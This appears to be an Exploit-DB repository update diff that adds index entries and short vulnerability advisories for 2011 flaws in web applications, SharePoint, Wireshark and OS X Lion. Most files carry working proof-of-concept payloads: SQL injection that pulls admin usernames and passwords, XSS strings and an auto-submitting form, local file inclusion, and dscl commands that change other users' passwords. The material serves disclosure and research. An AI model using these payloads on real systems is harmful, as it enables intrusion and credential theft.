Update: 2015-02-22

12 new exploits

files.csv

@@ -32555,6 +32555,18 @@ id,file,description,date,author,platform,type,port
 36125,platforms/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80
 36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080
 36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80
+36128,platforms/windows/remote/36128.txt,"Wireshark <= 1.6.1 Malformed Packet Trace File Remote Denial of Service Vulnerability",2011-09-08,Wireshark,windows,remote,0
 36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Include and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0
 36130,platforms/multiple/remote/36130.txt,"Spring Security HTTP Header Injection Vulnerability",2011-09-09,"David Mas",multiple,remote,0
 36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0
+36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 'CustomChart.aspx' Cross Site Scripting Vulnerability",2011-09-12,"Gustavo Roberto",asp,webapps,0
+36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0
+36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 'wpa_id' Parameter SQL Injection Vulnerability",2011-09-14,sherl0ck_,php,webapps,0
+36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 'index.php' Local File Include Vulnerability",2011-09-15,KedAns-Dz,php,webapps,0
+36137,platforms/php/webapps/36137.txt,"PunBB <= 1.3.5 Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0
+36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 'id' Parameter SQL Injection Vulnerability",2011-09-18,m3rciL3Ss,asp,webapps,0
+36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products Multiple SQL Injection Vulnerabilities",2011-09-17,m3rciL3Ss,asp,webapps,0
+36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0
+36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 'matchword' Parameter Cross Site Scripting Vulnerability",2011-09-19,"kurdish hackers team",asp,webapps,0
+36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0
+36143,platforms/osx/local/36143.txt,"Apple Mac OS X Lion Directory Services Security Bypass Vulnerabilities",2011-09-19,"Defence in Depth",osx,local,0

platforms/asp/webapps/36133.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49614/info
+
+Orion Network Performance Monitor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Orion Network Performance Monitor 10.1.3 is affected; other versions may also be vulnerable. 
+
+http://www.example.com/Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgRTLoss&NetObject=N:355&ResourceID=17&NetObjectPrefix=N&Rows=&Title=%3Cscript%3Ealert%28%27ALERTA%27%29%3C/script%3E 

platforms/asp/webapps/36134.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/49620/info
+
+Microsoft SharePoint is prone to multiple URI open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+Successful exploits may redirect a user to a potentially malicious site; this may aid in phishing attacks.
+
+The following products are affected;
+
+Microsoft SharePoint 2007
+Microsoft SharePoint 2010 
+
+http://www.example.com/Docs/Lists/Announcements/NewForm.aspx?Source=[xss] 

platforms/asp/webapps/36138.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49667/info
+
+ASP Basit Haber Script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+ASP Basit Haber Script 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/haber.asp?id=28+union+select+0,kullaniciadi,sifre,3,4,5+from+admin 

platforms/asp/webapps/36139.txt

@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/49668/info
+
+Multiple Ay Computer products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/v1/urundetay.asp?id=21%28%29
+
+http://www.example.com/v1/default.asp?getir=urunler&id=39%28%29
+
+http://www.example.com/v1/linkler.asp?id=2%28%29
+
+http://www.example.com/detay.asp?ilanid=8%28%29 [SQL]
+
+http://www.example.com/kategoriler.asp?id=4%28%29 [SQL]
+
+http://www.example.com/link.asp?page=referanslarimiz&id=2%28%29 [SQL]
+
+http://www.example.com/?catid=23+union+select+0,1,2,3,4,5+from+admin 

platforms/asp/webapps/36141.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49674/info
+
+Aspgwy Access is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Aspgwy Access 1.0.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/forum/search_results.asp?search_word=&matchword=[XSS] 

platforms/osx/local/36143.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49676/info
+
+Apple Mac OS X Lion is prone to multiple security-bypass vulnerabilities.
+
+Local attackers can exploit these issues to obtain sensitive information or change the password of other users on the computer, without sufficient privileges. 
+
+$ dscl localhost -read /Search/Users/bob
+
+$ dscl localhost -passwd /Search/Users/<username> 

platforms/php/webapps/36135.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49625/info
+
+Auctions plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Owen Cutajar Auctions versions 1.8.8 and prior are vulnerable. 
+
+http://www.example.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 

platforms/php/webapps/36136.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49650/info
+
+StarDevelop LiveHelp is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+StarDevelop LiveHelp 2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[path]/index.php?language_file=[LFI]%00 

platforms/php/webapps/36137.txt

@@ -0,0 +1,36 @@
+source: http://www.securityfocus.com/bid/49660/info
+
+PunBB is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+GET
+/login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script>
+GET
+/misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script>
+
+POST /delete.php?id=>"'><script>alert(oink)</script>
+form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_confirm=>"'><script>alert(oink)</script>&delete=>"'><script>alert(oink)</
+script>
+
+POST /edit.php?id=>"'><script>alert(oink)</script>
+form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</
+script>
+
+POST /login.php?action=>"'><script>alert(oink)</script>
+form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_email=>"'><script>alert(oink)</script>&request_pass=>"'><script>alert(oin
+k)</script>
+
+POST /misc.php?email=>"'><script>alert(oink)</script>
+form_sent=>"'><script>alert(oink)</script>&redirect_url=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_subject=>"'><script>alert(o
+ink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>
+
+POST
+/profile.php?action=>"'><script>alert(oink)</script>&id=>"'><script>alert(oink)</script>
+form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_old_password=>"'><script>alert(oink)</script>&req_new_password1=>"'><scri
+pt>alert(oink)</script>&req_new_password2=>"'><script>alert(oink)</script>&update=>"'><script>alert(oink)</script>
+
+POST /register.php?action=>"'><script>alert(oink)</script>
+form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_username=>"'><script>alert(oink)</script>&req_password1=>"'><script>alert
+(oink)</script>&req_password2=>"'><script>alert(369448)</script>&req_email1=>"'><script>alert(oink)</script>&timezone=>"'><script>alert(oink)</script>&register=>"'>
+<script>alert(oink)</script>

platforms/php/webapps/36140.txt

@@ -0,0 +1,46 @@
+source: http://www.securityfocus.com/bid/49673/info
+
+Toko LiteCMS is prone to an HTTP-response-splitting vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
+
+Toko LiteCMS 1.5.2 is vulnerable; other versions may also be affected. 
+
+Cross Site Scripting Vulnerabilities
+
+<html>
+<title>Toko Lite CMS 1.5.2 (EditNavBar.php) Multiple Parameters XSS POST Injection</title>
+<body bgcolor="#1C1C1C">
+<script type="text/javascript">
+function xss(){document.forms["xss"].submit();}
+</script>
+<br /><br />
+<form action="http://www.example.com/tokolite1.5.2/editnavbar.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
+<input type="hidden" name="currPath" value=&#039;"><script>alert(1)</script>&#039; />
+<input type="hidden" name="path" value=&#039;"><script>alert(2)</script>&#039; />
+</form>
+<a href="javascript: xss();" style="text-decoration:none">
+<b><font color="red"><center><h3>Exploit!</h3></center></font></b></a><br /><br />
+</body></html>
+
+
+HTTP Response Splitting
+
+====================================================================
+/edit.php:
+--------------------------------------------------------------------
+
+ 3: $charSet = "iso-8859-1";
+ 4: $dir = "ltr";
+ 5:
+ 6: if ( isset( $_POST[ "charSet" ] ) )
+ 7: {
+ 8:     $charSet = $_POST[ "charSet" ];
+ 9:
+10:     if ( $charSet == "windows-1255" )
+11:     {
+12:        $dir = "rtl";
+13:     }
+14: }
+15:
+16: header( "Content-Type: text/html; charset=" . $charSet );

platforms/php/webapps/36142.txt

@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/49675/info
+
+net4visions is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The following products are affected:
+
+net4visions iBrowser 1.4.1 Build 10182009
+net4visions iManager 1.2.8 Build 02012008
+net4visions iGallery 1.0.0
+
+iBrowser Plugin
+
+http://www.example.com/jscripts/tiny_mce/plugins/ibrowser/scripts/random.php?dir=<script>alert(&#039;zsl&#039;)</script>
+http://www.example.com/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/demo/phpThumb.demo.random.php?dir=<script>alert(&#039;zsl&#039;)</script>
+
+iManager Plugin
+
+http://www.example.com/jscripts/tiny_mce/plugins/imanager/scripts/random.php?dir=<script>alert(&#039;zsl&#039;)</script>
+http://www.example.com/jscripts/tiny_mce/plugins/imanager/scripts/phpThumb/demo/phpThumb.demo.random.php?dir=<script>alert(&#039;zsl&#039;)</script>
+
+iGallery Plugin 
+
+http://www.example.com/jscripts/tiny_mce/plugins/iGallery/scripts/pthumb/demo/phpThumb.demo.random.php?dir=<script>alert(&#039;zsl&#039;)</script>

platforms/windows/remote/36128.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49521/info
+
+Wireshark is prone to a remote denial-of-service vulnerability because it fails to properly handle certain files.
+
+Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
+
+Wireshark 1.4.0 to 1.4.8 and 1.6.0 to 1.6.1 are vulnerable. 
+
+http://www.exploit-db.com/sploits/36128.pcap